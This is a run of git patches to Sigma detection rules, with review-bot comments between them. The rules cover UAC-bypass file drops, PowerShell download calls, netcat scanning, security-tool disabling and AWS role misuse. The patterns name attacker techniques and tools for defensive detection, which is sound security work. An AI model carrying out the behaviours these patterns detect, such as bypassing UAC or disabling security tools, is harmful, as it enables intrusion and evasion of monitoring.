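Review bot: Each new `CommandLine|endswith: '\WerFault.exe'` (and the rundll32/regsvcs/regasm/regsvr32 equivalents in selection2–5) misses command lines where the image path is quoted, which is common in Sysmon process-creation events, because the recorded string then ends in `"` rather than `.exe`. Adding the quoted variant to each list keeps the "no arguments" intent, e.g. `- '\WerFault.exe'` followed by `- '\WerFault.exe"'`. With filter1 removed as the commit intends, that quoting gap is now the main source of silent misses; the `fields` block continues past the hunk.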
@@ -25,30 +25,20 @@ logsource: product: windows detection: selection1: - Image|endswith: - - '\WerFault.exe' - CommandLine|endswith: - - '\WerFault.exe' + Image|endswith: '\WerFault.exe' + CommandLine|endswith: '\WerFault.exe' selection2: - Image|endswith: - - '\rundll32.exe' - CommandLine|endswith: - - '\rundll32.exe' + Image|endswith: '\rundll32.exe' + CommandLine|endswith: '\rundll32.exe' selection3: - Image|endswith: - - '\regsvcs.exe' - CommandLine|endswith: - - '\regsvcs.exe' + Image|endswith: '\regsvcs.exe' + CommandLine|endswith: '\regsvcs.exe' selection4: - Image|endswith: - - '\regasm.exe' - CommandLine|endswith: - - '\regasm.exe' + Image|endswith: '\regasm.exe' + CommandLine|endswith: '\regasm.exe' selection5: - Image|endswith: - - '\regsvr32.exe' - CommandLine|endswith: - - '\regsvr32.exe' + Image|endswith: '\regsvr32.exe' + CommandLine|endswith: '\regsvr32.exe' condition: 1 of selection* fields: - ParentImage From aaa568ff2d8190c4b0b755d337b36382750fa420 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 2 Sep 2021 14:18:38 +0200 Subject: [PATCH 0700/1367] print covert by win_susp_print.yml --- .../process_creation_alternate_data_streams.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 7460de70..1723a3de 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -28,10 +28,6 @@ detection: CommandLine|contains|all: - 'makecab ' - '.cab' - selection_tools_print: - CommandLine|contains|all: - - 'print ' - - '/D:' selection_tools_reg: CommandLine|contains|all: - 'reg ' From 6a1b95d947bebbe84f4a9685d2ad9c0c52b028cc Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 2 Sep 2021 14:22:59 +0200 Subject: [PATCH 0701/1367] Findstr covert by win_susp_findstr.yml --- .../process_creation_alternate_data_streams.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/rules/windows/process_creation/process_creation_alternate_data_streams.yml b/rules/windows/process_creation/process_creation_alternate_data_streams.yml index 1723a3de..badd22c4 100644 --- a/rules/windows/process_creation/process_creation_alternate_data_streams.yml +++ b/rules/windows/process_creation/process_creation_alternate_data_streams.yml @@ -19,11 +19,6 @@ detection: CommandLine|contains|all: - 'type ' - ' > ' - selection_tools_findstr: - CommandLine|contains|all: - - 'findstr ' - - ' /V ' - - ' /L ' selection_tools_makecab: CommandLine|contains|all: - 'makecab ' From 0b373ff1e984254cb2c81fe1e78a45830418d6e9 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 2 Sep 2021 14:47:47 +0200 Subject: [PATCH 0702/1367] fix: remove 2nd selection due to FPs --- .../process_creation/win_uac_bypass_dismhost.yml | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index 6647013e..413109d9 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -17,7 +17,7 @@ logsource: category: process_creation product: windows detection: - selection1: + selection: ParentImage|contains|all: - 'C:\Users\' - '\AppData\Local\Temp\' @@ -25,13 +25,4 @@ detection: IntegrityLevel: - 'High' - 'System' - selection2: - Image|contains|all: - - 'C:\Users\' - - '\AppData\Local\Temp\' - - '\DismHost.exe' - IntegrityLevel: - - 'High' - - 'System' - ParentCommandLine: 'C:\Windows\system32\cleanmgr.exe /autoclean /d C:' - condition: 1 of selection* + condition: selection 
From 15e25f963520b1ca7cfa141d793fb71073e6bbcc Mon Sep 17 00:00:00 2001 From: klingerko Date: Thu, 2 Sep 2021 14:50:14 +0200 Subject: [PATCH 0703/1367] update modifed date --- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index cd4c42d0..3a857bbc 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -6,7 +6,7 @@ references: - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752 date: 2021/07/30 -modifed: 2021/08/26 +modifed: 2021/09/02 author: Florian Roth tags: - attack.defense_evasion From ab721c736cf5f098fbdc9a835df28dd6b85e36c4 Mon Sep 17 00:00:00 2001 
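Review bot: The bumped line keeps the misspelled key `modifed`; the Sigma schema field is `modified`, so tooling that reads the modification date will not see this value. Since the line is being touched anyway, change it to `modified: 2021/09/02`. The same typo exists in the old line, so it was already present before this commit.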
From: phantinuss Date: Thu, 2 Sep 2021 14:55:17 +0200 Subject: [PATCH 0704/1367] chore: move level/falsepositives to bottom --- .../file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml | 6 +++--- .../file_event/sysmon_uac_bypass_consent_comctl32.yml | 8 ++++---- .../file_event/sysmon_uac_bypass_dotnet_profiler.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml | 6 +++--- .../windows/file_event/sysmon_uac_bypass_msconfig_gui.yml | 6 +++--- .../file_event/sysmon_uac_bypass_ntfs_reparse_point.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_winsat.yml | 6 +++--- rules/windows/file_event/sysmon_uac_bypass_wmp.yml | 6 +++--- .../process_creation/win_hktl_uacme_uac_bypass.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_cleanmgr.yml | 6 +++--- .../process_creation/win_uac_bypass_consent_comctl32.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_dismhost.yml | 6 +++--- .../windows/process_creation/win_uac_bypass_ieinstal.yml | 6 +++--- .../process_creation/win_uac_bypass_msconfig_gui.yml | 6 +++--- .../win_uac_bypass_ntfs_reparse_point.yml | 6 +++--- rules/windows/process_creation/win_uac_bypass_winsat.yml | 6 +++--- rules/windows/process_creation/win_uac_bypass_wmp.yml | 6 +++--- .../registry_event/sysmon_uac_bypass_shell_open.yml | 6 +++--- rules/windows/registry_event/sysmon_uac_bypass_winsat.yml | 6 +++--- rules/windows/registry_event/sysmon_uac_bypass_wmp.yml | 6 +++--- 20 files changed, 61 insertions(+), 61 deletions(-) diff --git a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml index fca1e671..b5cec569 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_cleanmgr_tmpfile.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows 
@@ -23,3 +20,6 @@ detection: TargetFilename|contains: '\AppData\Local\Temp\' TargetFilename|endswith: '.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml index da6b278e..fd9c808f 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_consent_comctl32.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -20,4 +17,7 @@ detection: selection: TargetFilename|startswith: 'C:\Windows\System32\consent.exe.@' TargetFilename|endswith: '\comctl32.dll' - condition: selection \ No newline at end of file + condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml index 574a79b9..f2dd94cf 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\pe386.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml index 9ba625f0..826af0cb 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml 
@@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -23,3 +20,6 @@ detection: TargetFilename|contains: '\AppData\Local\Temp\' TargetFilename|endswith: 'consent.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml index cc0d08e6..d896bdb0 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_msconfig_gui.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\pkgmgr.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml index 4c8b8198..7494bc23 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_ntfs_reparse_point.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -21,3 +18,6 @@ detection: TargetFilename|startswith: 'C:\Users\' TargetFilename|endswith: '\AppData\Local\Temp\api-ms-win-core-kernel32-legacy-l1.DLL' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml index 74017b15..07a32c8c 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml 
+++ b/rules/windows/file_event/sysmon_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -23,3 +20,6 @@ detection: - '\AppData\Local\Temp\system32\winsat.exe' - '\AppData\Local\Temp\system32\winmm.dll' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml index efb7a09c..1026649f 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: file_event product: windows @@ -24,3 +21,6 @@ detection: Image: 'C:\Windows\system32\DllHost.exe' TargetFilename: 'C:\Program Files\Windows Media Player\osk.exe' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml index 09ac275e..a491142c 100644 --- a/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml +++ b/rules/windows/process_creation/win_hktl_uacme_uac_bypass.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -22,3 +19,6 @@ detection: - Company: 'REvol Corp' - OriginalFileName: 'Akagi.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml index 3ed387b3..b2e34b5f 100644 --- a/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml 
+++ b/rules/windows/process_creation/win_uac_bypass_cleanmgr.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml index e690075d..201451ab 100644 --- a/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml +++ b/rules/windows/process_creation/win_uac_bypass_consent_comctl32.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_dismhost.yml b/rules/windows/process_creation/win_uac_bypass_dismhost.yml index 413109d9..64e8fe82 100644 --- a/rules/windows/process_creation/win_uac_bypass_dismhost.yml +++ b/rules/windows/process_creation/win_uac_bypass_dismhost.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -26,3 +23,6 @@ detection: - 'High' - 'System' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml index 7c734ccf..2db105f4 100644 --- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml 
@@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -25,3 +22,6 @@ detection: Image|contains: '\AppData\Local\Temp\' Image|endswith: 'consent.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml index a7d65fd2..96e43028 100644 --- a/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/process_creation/win_uac_bypass_msconfig_gui.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: ParentImage|endswith: '\AppData\Local\Temp\pkgmgr.exe' CommandLine: '"C:\Windows\system32\msconfig.exe" -5' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml index 4319cada..720da752 100644 --- a/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/process_creation/win_uac_bypass_ntfs_reparse_point.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -34,3 +31,6 @@ detection: - '\dismhost.exe {' Image|endswith: '\DismHost.exe' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_winsat.yml b/rules/windows/process_creation/win_uac_bypass_winsat.yml index c9ec3b38..5350f745 100644 --- a/rules/windows/process_creation/win_uac_bypass_winsat.yml 
+++ b/rules/windows/process_creation/win_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -24,3 +21,6 @@ detection: ParentImage|endswith: '\AppData\Local\Temp\system32\winsat.exe' ParentCommandLine|contains: 'C:\Windows \system32\winsat.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/win_uac_bypass_wmp.yml b/rules/windows/process_creation/win_uac_bypass_wmp.yml index 25ab25c7..df9bfe07 100644 --- a/rules/windows/process_creation/win_uac_bypass_wmp.yml +++ b/rules/windows/process_creation/win_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: process_creation product: windows @@ -29,3 +26,6 @@ detection: - 'High' - 'System' condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml index 38c9c889..68481a95 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_shell_open.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -21,3 +18,6 @@ detection: TargetObject|endswith: '_Classes\ms-settings\shell\open\command\SymbolicLinkValue' Details|contains: '\Software\Classes\{' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml index 5d375369..43efa10c 100644 
--- a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -23,3 +20,6 @@ detection: Details|startswith: 'c:\users\' Details|endswith: '\appdata\local\temp\system32\winsat.exe' condition: selection +falsepositives: + - Unknown +level: high diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml index ce2652e0..22f04a70 100644 --- a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml +++ b/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml @@ -10,9 +10,6 @@ tags: - attack.defense_evasion - attack.privilege_escalation - attack.t1548.002 -falsepositives: - - Unknown -level: high logsource: category: registry_event product: windows @@ -21,3 +18,6 @@ detection: TargetObject|endswith: '\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Windows Media Player\osk.exe' Details: 'Binary Data' condition: selection +falsepositives: + - Unknown +level: high From 9bcefc6a937bb700e30cb410643436ce67ca751b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 16:05:05 +0200 Subject: [PATCH 0705/1367] move uuid from global --- rules/windows/powershell/powershell_suspicious_download.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_suspicious_download.yml b/rules/windows/powershell/powershell_suspicious_download.yml index 1548d8cb..4870c05b 100644 --- a/rules/windows/powershell/powershell_suspicious_download.yml +++ b/rules/windows/powershell/powershell_suspicious_download.yml 
@@ -1,6 +1,5 @@ action: global title: Suspicious PowerShell Download -id: 65531a81-a694-4e31-ae04-f8ba5bc33759 status: experimental description: Detects suspicious PowerShell download command tags: @@ -14,6 +13,7 @@ falsepositives: - PowerShell scripts that download content from the Internet level: medium --- +id: 65531a81-a694-4e31-ae04-f8ba5bc33759 logsource: product: windows service: powershell @@ -25,6 +25,7 @@ detection: - '.DownloadString(' condition: webclient and download --- +id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d logsource: product: windows service: powershell-classic From 7ccb773b20ee2494e62279f3484c7b08f5a1f889 Mon Sep 17 00:00:00 2001 From: Rachel Rice Date: Thu, 2 Sep 2021 17:37:41 +0100 Subject: [PATCH 0706/1367] Update AWS Update Login Profile rule Update selection criteria for AWS Update Login Profile rule to check for mismatch between userIdentity.arn and requestParameters.userName. Closes SigmaHQ/sigma#1966. --- rules/cloud/aws/aws_update_login_profile.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_update_login_profile.yml b/rules/cloud/aws/aws_update_login_profile.yml index 8ac3ea17..6815fe2f 100644 --- a/rules/cloud/aws/aws_update_login_profile.yml +++ b/rules/cloud/aws/aws_update_login_profile.yml @@ -15,7 +15,7 @@ detection: eventSource: iam.amazonaws.com eventName: UpdateLoginProfile filter: - userIdentity.arn|contains: responseElements.accessKey.userName + userIdentity.arn|contains: requestParameters.userName condition: selection_source and not filter fields: - userIdentity.arn From 78d3fa4795373ccf8613fb75f4650d46eeb8f014 Mon Sep 17 00:00:00 2001 
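Review bot: The powershell-classic document now carries a brand-new id `3236fcd0-b7e3-4433-b4f8-86ad61a9af2d` while `65531a81-…` identifies only the `service: powershell` document, so any suppression, tuning or ticket mapping keyed on the old id stops covering the classic-log variant after this change. Nothing in the file links the two documents, which makes that silent; if the Sigma version in use supports `related`, add `related: - id: 65531a81-a694-4e31-ae04-f8ba5bc33759` with `type: similar` to the second document (and the inverse on the first) so consumers can group them. The same caveat applies to every file in this series that splits a global rule into per-logsource ids, and it is worth one line in the commit description.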
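Review bot: The new filter value `requestParameters.userName` is a literal string, not a reference to another event field — Sigma rules have no field-to-field comparison, so `userIdentity.arn|contains: requestParameters.userName` only matches ARNs that literally contain that text, `not filter` is true for practically every event, and the rule fires on every UpdateLoginProfile call including a user resetting their own console password. The replaced `responseElements.accessKey.userName` line had the same problem, so the commit changes which literal is compared but not the underlying defect, and the "mismatch" described in the commit message is not what the converted query will test. The self-vs-other check has to live in the backend (a SIEM-side expression comparing the two fields) or be documented as a post-processing step; at minimum add a comment next to the filter, e.g. `# NOTE: Sigma cannot compare two event fields; the userIdentity.arn / requestParameters.userName mismatch must be implemented in the target query language`. If the rule keeps its current level, also list self-service password changes under `falsepositives` (that field is outside the hunk).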
From: Rachel Rice Date: Thu, 2 Sep 2021 17:32:33 +0100 Subject: [PATCH 0707/1367] Update AWS STS AssumeRole Misuse rule Update selection criteria for AWS STS AssumeRole Misuse rule for any event by an AssumedRole userIdentity. Closes SigmaHQ/sigma#1963. --- rules/cloud/aws/aws_sts_assumerole_misuse.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/cloud/aws/aws_sts_assumerole_misuse.yml b/rules/cloud/aws/aws_sts_assumerole_misuse.yml index f7464612..6163a040 100644 --- a/rules/cloud/aws/aws_sts_assumerole_misuse.yml +++ b/rules/cloud/aws/aws_sts_assumerole_misuse.yml @@ -12,8 +12,7 @@ logsource: service: cloudtrail detection: selection: - eventSource: sts.amazonaws.com - eventName: AssumeRole + userIdentity.type: AssumedRole userIdentity.sessionContext.sessionIssuer.type: Role condition: selection level: low From 086a15fc4504ccb527e7f4a28ec05955ba019408 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 2 Sep 2021 20:07:03 +0200 Subject: [PATCH 0708/1367] Update global ID --- rules/compliance/cleartext_protocols.yml | 3 +- ...itd_cve_2021_3156_sudo_buffer_overflow.yml | 3 +- rules/linux/lnx_network_service_scanning.yml | 3 +- rules/linux/lnx_security_tools_disabling.yml | 3 +- rules/linux/lnx_sudo_cve_2019_14287.yml | 3 +- rules/linux/lnx_system_info_discovery.yml | 3 +- rules/network/net_high_dns_bytes_out.yml | 3 +- rules/network/net_high_dns_requests_rate.yml | 3 +- rules/network/net_susp_network_scan.yml | 3 +- rules/windows/builtin/win_apt_apt29_tor.yml | 1 + .../win_cobaltstrike_service_installs.yml | 3 +- .../win_invoke_obfuscation_clip+_services.yml | 4 ++- ...ke_obfuscation_obfuscated_iex_services.yml | 4 ++- ...win_invoke_obfuscation_stdin+_services.yml | 4 ++- .../sysmon_wmiprvse_wbemcomn_dll_hijack.yml | 3 +- tools/sigma/sigma_uuid.py | 30 ++++++++++++++++--- 16 files changed, 58 insertions(+), 18 deletions(-) 
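Review bot: The new selection `userIdentity.type: AssumedRole` plus `userIdentity.sessionContext.sessionIssuer.type: Role` matches every CloudTrail record produced by any role session — EC2 instance profiles, Lambda execution roles, cross-account access — rather than AssumeRole calls, so the rule now fires on a large share of all API activity and no longer isolates anything that reads as misuse; for an `AssumedRole` identity the `sessionIssuer.type: Role` line also looks redundant. If the intent is a hunting baseline, say so in `description` and `falsepositives` (both outside the hunk) and keep `level: low`; if it is meant to alert, narrow it, for example by restoring `eventSource: sts.amazonaws.com` and `eventName: AssumeRole` alongside `userIdentity.type: AssumedRole` so that role chaining (a role session assuming a further role) is what triggers. Whichever is chosen, the commit description's "any event by an AssumedRole userIdentity" should be reflected in the rule's own description so operators are not surprised by the volume.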
diff --git a/rules/compliance/cleartext_protocols.yml b/rules/compliance/cleartext_protocols.yml index 40905d70..e50e0ea2 100644 --- a/rules/compliance/cleartext_protocols.yml +++ b/rules/compliance/cleartext_protocols.yml @@ -1,6 +1,5 @@ action: global title: Cleartext Protocol Usage -id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f status: stable description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. @@ -57,6 +56,7 @@ level: low # - PCI DSS 3.2 7.2 # - PCI DSS 3.2 7.3 --- +id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f logsource: product: netflow detection: @@ -80,6 +80,7 @@ detection: - 5904 condition: selection --- +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e logsource: category: firewall detection: diff --git a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml index da9e53df..737df5c2 100644 --- a/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml +++ b/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml @@ -1,6 +1,5 @@ action: global title: CVE-2021-3156 Exploitation Attempt -id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f status: experimental description: Detects exploitation attempt of vulnerability described in CVE-2021-3156. | Alternative approach might be to look for flooding of auditd logs due to bruteforcing | @@ -21,6 +20,7 @@ logsource: product: linux service: auditd --- +id: 5ee37487-4eb8-4ac2-9be1-d7d14cdc559f detection: selection: type: 'EXECVE' @@ -43,6 +43,7 @@ detection: a4: '\' condition: selection and (cmd1 or cmd2 or cmd3 or cmd4) and (cmd5 or cmd6 or cmd7 or cmd8) | count() by host > 50 --- +id: b9748c98-9ea7-4fdb-80b6-29bed6ba71d2 detection: selection: type: 'SYSCALL' 
diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/lnx_network_service_scanning.yml index 831c1dac..ce6d798d 100644 --- a/rules/linux/lnx_network_service_scanning.yml +++ b/rules/linux/lnx_network_service_scanning.yml @@ -1,6 +1,5 @@ action: global title: Linux Network Service Scanning -id: 3e102cd9-a70d-4a7a-9508-403963092f31 status: experimental description: Detects enumeration of local or remote network services. author: Alejandro Ortuno, oscd.community @@ -14,6 +13,7 @@ tags: - attack.discovery - attack.t1046 --- +id: 3e102cd9-a70d-4a7a-9508-403963092f31 logsource: category: process_creation product: linux @@ -31,6 +31,7 @@ detection: CommandLine|contains: 'l' condition: (netcat and not netcat_listen_flag) or network_scanning_tools --- +id: 3761e026-f259-44e6-8826-719ed8079408 logsource: product: linux service: auditd diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index 2fee4c8e..a51eade7 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -1,6 +1,5 @@ action: global title: Disabling Security Tools -id: e3a8a052-111f-4606-9aee-f28ebeb76776 status: experimental description: Detects disabling security tools author: Ömer Günal, Alejandro Ortuno, oscd.community @@ -15,6 +14,7 @@ tags: - attack.t1562.004 - attack.t1089 # an old one --- +id: e3a8a052-111f-4606-9aee-f28ebeb76776 logsource: category: process_creation product: linux @@ -84,6 +84,7 @@ detection: - 'falcon-sensor' condition: 1 of them --- +id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 logsource: product: linux service: syslog diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index 84ab95b7..426f5934 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ 